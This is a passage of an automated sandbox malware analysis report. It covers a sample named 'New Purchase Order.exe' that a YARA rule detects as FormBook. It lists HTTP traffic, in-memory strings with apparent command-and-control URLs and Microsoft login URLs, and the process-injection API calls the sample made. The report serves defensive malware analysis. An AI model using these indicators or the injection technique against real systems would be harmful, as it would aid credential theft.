                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:42:56 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w%2F74XyXSEwvYmpRFhGdnd2ofG2kgmFNS8MJ5VhoVFeSxsJtVoy09Sv7Q%2FspUfjj%2B53wZGUYlJjYu3iVcal0vOVniH1OTX4Lp0qrtK7sr2g6VE6kvcnlRWrJi1h8vDLy4%2BXwXaIs%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ec3fb9c5eb243be-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1721&min_rtt=1721&rtt_var=860&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=641&delivery_rate=0&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:42:59 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pwG9GsyzKh8Tcmmhkawf%2FtFCrgXxKWUWRzTYPPIm3wxLM%2Bc8jMYAhgR9b6vtVcqOVkG1D70Y2GcTRKUpYg8gFw9WPNKLbiVNTH4MyllY8gAL2EF9%2F4%2BPEU4VoDq1zBYYCrOnLUo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ec3fbad298d5e74-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1668&min_rtt=1668&rtt_var=834&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=661&delivery_rate=0&cwnd=95&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:43:02 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u7uIgTGJkdu0J5HgOFJqIUUOn7OrA3zNodPu%2FLBVXZCLb%2Fy7lOHYkgRmJQqc%2FyjJe04k6iezh0MYSjT2WTb0N7MW9Wr3Y%2BuHGqDolMxVxH0G774%2FeIzar7wjlHZWoauoNuz9ddo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ec3fbbe28fd0f3d-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1551&min_rtt=1551&rtt_var=775&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1674&delivery_rate=0&cwnd=129&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:43:05 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ko0cyYGrQDO%2BfemQ5%2BhtwJ4ihE76aAWvG2w0uzpHm%2Fb%2FAkYNunuuwqPVN8gzK%2BHqvpliuptxquDeQfauJKdY8Zeb45GSa0VZSFNRvZYsVhLdme1TvheO691VrIyZrGsSnc9nCGQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ec3fbd31c69de92-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1495&min_rtt=1495&rtt_var=747&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=371&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome
                Source: New Purchase Order.exe, 00000000.00000002.1298865239.00000000032A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://localhost/arkanoid_server/requests.php
                Source: ILRIqlNpKN.exe, 0000000F.00000002.2507216654.0000000005224000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.bser101pp.buzz
                Source: ILRIqlNpKN.exe, 0000000F.00000002.2507216654.0000000005224000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.bser101pp.buzz/v89f/
                Source: ILRIqlNpKN.exe, 0000000F.00000002.2505584035.0000000003478000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.madhf.tech/6ou6/?HZ=We72k2U8RqyHNx9c0lgrcMajP
                Source: isoburn.exe, 0000000C.00000003.2009114135.00000000084E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: isoburn.exe, 0000000C.00000003.2009114135.00000000084E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: isoburn.exe, 0000000C.00000003.2009114135.00000000084E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: isoburn.exe, 0000000C.00000003.2009114135.00000000084E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: isoburn.exe, 0000000C.00000003.2009114135.00000000084E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: isoburn.exe, 0000000C.00000003.2009114135.00000000084E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: isoburn.exe, 0000000C.00000003.2009114135.00000000084E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: isoburn.exe, 0000000C.00000002.2501042971.0000000003489000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.L
                Source: isoburn.exe, 0000000C.00000002.2501042971.0000000003489000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: isoburn.exe, 0000000C.00000002.2501042971.0000000003489000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: isoburn.exe, 0000000C.00000002.2501042971.0000000003489000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: isoburn.exe, 0000000C.00000002.2501042971.0000000003489000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: isoburn.exe, 0000000C.00000002.2501042971.0000000003489000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: isoburn.exe, 0000000C.00000002.2501042971.0000000003489000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: isoburn.exe, 0000000C.00000003.2002879403.00000000084D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: isoburn.exe, 0000000C.00000002.2506017590.0000000005D86000.00000004.10000000.00040000.00000000.sdmp, ILRIqlNpKN.exe, 0000000F.00000002.2505584035.00000000032E6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.cstrategy.online/qx5d/?HZ=IyUQrkKyuirfHSYtNcNb8FX1VMdObdd7C0LSkI7uCAGWAT/RC
                Source: isoburn.exe, 0000000C.00000003.2009114135.00000000084E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: isoburn.exe, 0000000C.00000003.2009114135.00000000084E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 8.2.New Purchase Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.New Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000C.00000002.2504764936.0000000004FB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.2504595570.0000000004F60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1802340640.00000000015B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.2500548268.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2507216654.00000000051A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1801600414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2505024909.0000000002BC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1804003305.0000000001A10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: New Purchase Order.exe
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0042C663 NtClose,8_2_0042C663
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01732B60 NtClose,LdrInitializeThunk,8_2_01732B60
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01732DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_01732DF0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01732C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_01732C70
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017335C0 NtCreateMutant,LdrInitializeThunk,8_2_017335C0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01734340 NtSetContextThread,8_2_01734340
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01734650 NtSuspendThread,8_2_01734650
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01732BF0 NtAllocateVirtualMemory,8_2_01732BF0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01732BE0 NtQueryValueKey,8_2_01732BE0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01732BA0 NtEnumerateValueKey,8_2_01732BA0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01732B80 NtQueryInformationFile,8_2_01732B80
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01732AF0 NtWriteFile,8_2_01732AF0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01732AD0 NtReadFile,8_2_01732AD0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01732AB0 NtWaitForSingleObject,8_2_01732AB0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01732D30 NtUnmapViewOfSection,8_2_01732D30
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01732D10 NtMapViewOfSection,8_2_01732D10
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01732D00 NtSetInformationFile,8_2_01732D00
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01732DD0 NtDelayExecution,8_2_01732DD0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01732DB0 NtEnumerateKey,8_2_01732DB0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01732C60 NtCreateKey,8_2_01732C60
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01732C00 NtQueryInformationProcess,8_2_01732C00
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01732CF0 NtOpenProcess,8_2_01732CF0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01732CC0 NtQueryVirtualMemory,8_2_01732CC0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01732CA0 NtQueryInformationToken,8_2_01732CA0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01732F60 NtCreateProcessEx,8_2_01732F60
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01732F30 NtCreateSection,8_2_01732F30
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01732FE0 NtCreateFile,8_2_01732FE0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01732FB0 NtResumeThread,8_2_01732FB0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01732FA0 NtQuerySection,8_2_01732FA0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01732F90 NtProtectVirtualMemory,8_2_01732F90
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01732E30 NtWriteVirtualMemory,8_2_01732E30
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01732EE0 NtQueueApcThread,8_2_01732EE0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01732EA0 NtAdjustPrivilegesToken,8_2_01732EA0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01732E80 NtReadVirtualMemory,8_2_01732E80
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01733010 NtOpenDirectoryObject,8_2_01733010
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01733090 NtSetValueKey,8_2_01733090
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017339B0 NtGetContextThread,8_2_017339B0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01733D70 NtOpenThread,8_2_01733D70
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01733D10 NtOpenProcessToken,8_2_01733D10
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05254650 NtSuspendThread,LdrInitializeThunk,12_2_05254650
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05254340 NtSetContextThread,LdrInitializeThunk,12_2_05254340
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05252D30 NtUnmapViewOfSection,LdrInitializeThunk,12_2_05252D30
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05252D10 NtMapViewOfSection,LdrInitializeThunk,12_2_05252D10
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05252DF0 NtQuerySystemInformation,LdrInitializeThunk,12_2_05252DF0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05252DD0 NtDelayExecution,LdrInitializeThunk,12_2_05252DD0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05252C60 NtCreateKey,LdrInitializeThunk,12_2_05252C60
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05252C70 NtFreeVirtualMemory,LdrInitializeThunk,12_2_05252C70
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05252CA0 NtQueryInformationToken,LdrInitializeThunk,12_2_05252CA0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05252F30 NtCreateSection,LdrInitializeThunk,12_2_05252F30
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05252FB0 NtResumeThread,LdrInitializeThunk,12_2_05252FB0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05252FE0 NtCreateFile,LdrInitializeThunk,12_2_05252FE0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05252E80 NtReadVirtualMemory,LdrInitializeThunk,12_2_05252E80
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05252EE0 NtQueueApcThread,LdrInitializeThunk,12_2_05252EE0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05252B60 NtClose,LdrInitializeThunk,12_2_05252B60
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05252BA0 NtEnumerateValueKey,LdrInitializeThunk,12_2_05252BA0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05252BE0 NtQueryValueKey,LdrInitializeThunk,12_2_05252BE0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05252BF0 NtAllocateVirtualMemory,LdrInitializeThunk,12_2_05252BF0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05252AF0 NtWriteFile,LdrInitializeThunk,12_2_05252AF0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05252AD0 NtReadFile,LdrInitializeThunk,12_2_05252AD0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052535C0 NtCreateMutant,LdrInitializeThunk,12_2_052535C0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052539B0 NtGetContextThread,LdrInitializeThunk,12_2_052539B0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05252D00 NtSetInformationFile,12_2_05252D00
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05252DB0 NtEnumerateKey,12_2_05252DB0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05252C00 NtQueryInformationProcess,12_2_05252C00
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05252CF0 NtOpenProcess,12_2_05252CF0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05252CC0 NtQueryVirtualMemory,12_2_05252CC0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05252F60 NtCreateProcessEx,12_2_05252F60
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05252FA0 NtQuerySection,12_2_05252FA0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05252F90 NtProtectVirtualMemory,12_2_05252F90
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05252E30 NtWriteVirtualMemory,12_2_05252E30
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05252EA0 NtAdjustPrivilegesToken,12_2_05252EA0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05252B80 NtQueryInformationFile,12_2_05252B80
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05252AB0 NtWaitForSingleObject,12_2_05252AB0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05253010 NtOpenDirectoryObject,12_2_05253010
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05253090 NtSetValueKey,12_2_05253090
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05253D10 NtOpenProcessToken,12_2_05253D10
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05253D70 NtOpenThread,12_2_05253D70
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02FB9210 NtReadFile,12_2_02FB9210
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02FB93A0 NtClose,12_2_02FB93A0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02FB9300 NtDeleteFile,12_2_02FB9300
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02FB90A0 NtCreateFile,12_2_02FB90A0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02FB9510 NtAllocateVirtualMemory,12_2_02FB9510
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_031222E00_2_031222E0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_03120F580_2_03120F58
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_031274880_2_03127488
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_0312225D0_2_0312225D
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_0312A60B0_2_0312A60B
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_03122BBA0_2_03122BBA
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_03122BC80_2_03122BC8
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_03120EED0_2_03120EED
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_031213F80_2_031213F8
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_031237980_2_03123798
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_031237A80_2_031237A8
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_0814E4400_2_0814E440
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_0814C7E80_2_0814C7E8
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_081489000_2_08148900
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_0814A9780_2_0814A978
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_08148D380_2_08148D38
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_08148D280_2_08148D28
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_081491700_2_08149170
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_081484C70_2_081484C7
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_004185838_2_00418583
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_004030408_2_00403040
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_004010008_2_00401000
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0040E1088_2_0040E108
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0040E1138_2_0040E113
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_004012708_2_00401270
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_004022A58_2_004022A5
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_004022B08_2_004022B0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_00402B218_2_00402B21
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_00402B308_2_00402B30
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0040242E8_2_0040242E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_004024308_2_00402430
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0042ECA38_2_0042ECA3
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0040FDAB8_2_0040FDAB
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0040FDB38_2_0040FDB3
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_004027108_2_00402710
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0040DFC38_2_0040DFC3
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0040FFD38_2_0040FFD3
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_004167938_2_00416793
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017881588_2_01788158
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0179A1188_2_0179A118
